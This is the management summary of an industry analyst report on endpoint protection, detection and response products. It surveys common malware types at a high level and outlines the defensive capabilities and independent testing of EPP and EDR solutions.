1 Management Summary
The KuppingerCole Market Compass provides an overview of a market segment and the vendors in the Endpoint Protection, Detection & Response (EPDR) market. It covers the trends that are influencing this market segment and the essential capabilities required of solutions in this space. It also provides ratings of how well these solutions meet our expectations. This report covers the previously distinct but converging fields and product lines of Endpoint Protection (EPP) and Endpoint Detection & Response (EDR).
Malware comes in many forms: viruses, worms, rootkits, botnets, file-less malware, ransomware, and crypto-miners are prevalent in the wild. Malware is usually, and almost by definition, an exploitation of an operating system or application vulnerability.
Viruses are far more sophisticated than they were decades ago. Now viruses are generally polymorphic, meaning they alter their structure to try to avoid detection upon every iteration. Viruses infect files and usually need user interaction to initiate a compromise.
Worms spread across unsecured networks, relying upon unpatched, compromised applications and unprotected ports.
Rootkits are low-level malware usually implemented like device drivers in operating systems. Rootkits allow bad actors complete control of affected machines.
Botnets are collections of controlled devices, often compromised by rootkits, that are used in large numbers to magnify other kinds of attacks, such as Distributed Denial of Service (DDoS) attacks, credential stuffing, account take-overs (ATOs), or other forms of cybercrime. Botnets can be composed of PCs, servers, smartphones, IoT devices, etc.
File-less malware is a malicious innovation that seeks to avoid signature-based anti-malware scanners by propagating between machines without being written and transferred as files. Instead, file-less malware is malicious code which spreads by process or memory injection. Once on a target device, file-less malware uses native tools like PowerShell or .NET to assemble and execute the malicious payload. File-less malware attacks are on the rise.
Ransomware attacks are still popular and evolving. Ransomware is a form of malware that either locks users’ screens or now more commonly encrypts users’ data, demanding that ransom be paid for the return of control or for decryption keys. The newest forms of malware can be deployed similarly to an APT campaign, with staging of ransomware on various machines throughout an enterprise and exfiltration of data prior to ransomware detonation. Needless to say, paying the ransom only emboldens the perpetrators and perpetuates the ransomware problem. Over the last couple of years, attackers have used ransomware techniques and payloads for purely destructive purposes too – rather than asking for ransom, these destructive “wiper” malware types simply delete or zero out data.
Much of the cybersecurity industry has, in recent years, shifted focus to detection and response rather than prevention. However, in the case of ransomware and wipers, detection is pretty easy because the malware announces its presence as soon as it has compromised a device. That leaves the user to deal with the aftermath. Once infected, the choices are to:
- Pay the ransom and hope that malefactors return control or send decryption keys (not recommended, and it doesn’t always work)
- Wipe the machine and restore data from backup
- In the case of wipers, there is no choice but to restore from backup.
Restoration is sometimes problematic if users or organizations haven’t been keeping up with backups. Even if backups are readily available, time will be lost in cleaning up the compromised computer and restoring the data. Thus, preventing ransomware infections is preferred. However, no anti-malware product is 100% effective at prevention. It is still necessary to have good, tested backup/restore processes for cases where anti-malware fails.
Most ransomware attacks arrive as weaponized Office docs via phishing campaigns. Disabling macros can help, but this is not universally effective since many users need to use legitimate macros. Ransomware can also come less commonly come from drive-by downloads and malvertising.
Crypto-jacking is the unwanted execution of crypto-mining software on user devices. Crypto-jackers capitalized on the surge of cryptocurrency prices. Though cryptocurrency prices are down crypto-jacking is still a threat to unprotected devices, annoying device owners with increased power costs and depleted batteries in the case of mobile devices. Initially, some anti-malware solutions did not identify crypto-mining software as malicious, since it could be built with freely available and sometimes legitimate code.
All end-user computers, smartphones, and tablets should have anti-malware endpoint security clients installed, preferably with up-to-date subscriptions. Servers and virtual desktops should be protected as well. Windows platforms are still the most vulnerable, though there are increasing amounts of malware for Android. It is important to remember that Apple’s iOS and Mac devices are not immune from malware, and as market share increases, particularly for Mac devices, the amount of malware for that platform will increase too.
Endpoint Detection & Response solutions look for evidence and effects of malware that may have slipped past EPP products. EDR tools are also used to find signs of malicious insider activities such as data exfiltration attempts, left-behind accounts, and open ports. EDR solutions log activities centrally, allow administrators to examine endpoints remotely, and generate reports often complete with attribution theories and confidence levels.
Additionally, as part of the detection process, EDR also performs evaluation of threat intelligence information, event correlation, interactive querying, live memory analysis, and activity recording and playback. EDR helps to automatically uncover attacks and enables security teams to understand what is happening from start to finish by consolidating all relevant information into a single view.
For the response phase, EDR solutions can provide alerts and reports, create attribution theories with confidence levels, automatically update detection rules, shut down offending processes, delete or move files, automatic quarantine of assets suspected of having been compromised, and even automatic rollback of compromised to known good states.
Like EPP, EDR solutions can be tightly integrated with other tools in vendor suites and can interoperate with security analytics tools.
A number of different, independent testing regimes exist that vendors can participate in to demonstrate the effectiveness of their products. AV-Comparatives, AV-Test, ICSALabs, and NSSLabs run tests focusing on malware detection and prevention. They also run in-depth tests to simulate the kinds of scenarios business users encounter. KuppingerCole reviewed test results as published by these organizations for vendors examined below.
The MITRE ATT&CK Framework is a comprehensive look at all the various TTPs that malicious actors use to compromise systems for the purpose of data exfiltration. Many security vendors contribute to MITRE ATT&CK and many of their tools map detections to the various steps and techniques to facilitate analysis. MITRE has performed two full test scenarios simulating and attack by APT3 and APT29. These tests demonstrate the abilities of vendors’ EDR products (and services from MSSPs) to detect and alert on malicious behavior. Many vendors participated in these tests, particularly the most recent one based on APT29. The results of these simulated attacks and the effectiveness of vendor responses are considered and noted in this Market Compass. Such tests are point-in-time measurements, not absolute determinants of efficacy and value in customer environments. It is also possible and likely that individual deficiencies that were observed in vendor products may have been remedied by now.
This Market Compass covers solutions that contain capabilities found in both EPP and EDR products.